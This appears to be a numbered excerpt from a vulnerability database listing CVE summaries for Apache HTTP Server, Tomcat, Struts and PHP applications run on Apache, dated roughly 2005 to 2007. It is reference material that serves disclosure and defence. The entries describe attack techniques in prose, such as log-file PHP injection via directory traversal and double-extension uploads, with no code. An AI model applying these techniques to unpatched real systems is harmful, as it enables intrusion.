13629| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
13630| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
13631| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
13632| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
13633| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
13634| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
13635| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
13636| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
13637| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
13638| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
13639| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
13640| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
13641| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
13642| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
13643| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
13644| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
13645| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
13646| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
13647| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
13648| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
13649| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
13650| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
13651| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13652| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13653| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
13654| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
13655| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
13656| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13657| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
13658| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
13659| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
13660| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
13661| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
13662| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
13663| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
13664| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
13665| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
13666| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
13667| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
13668| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
13669| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
13670| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13671| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13672| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
13673| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
13674| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
13675| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
13676| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
13677| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
13678| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
13679| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13680| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
13681| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13682| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
13683| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
13684| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
13685| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13686| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
13687| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13688| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
13689| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
13690| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13691| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
13692| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
13693| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
13694| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
13695| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
13696| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
13697| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
13698| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
13699| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13700| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
13701| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
13702| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
13703| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
13704| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
13705| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
13706| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
13707| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
13708| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
13709| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
13710| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
13711| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
13712| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
13713| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
13714| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
13715| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
13716| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
13717| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
13718| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
13719| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
13720| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
13721| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13722| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13723| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
13724| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
13725| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
13726| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
13727| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
13728| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
13729| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
13730| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
13731| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
13732| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
13733| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
13734| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
13735| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
13736| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
13737| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
13738| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
13739| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
13740| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
13741| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
13742| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
13743| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
13744| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
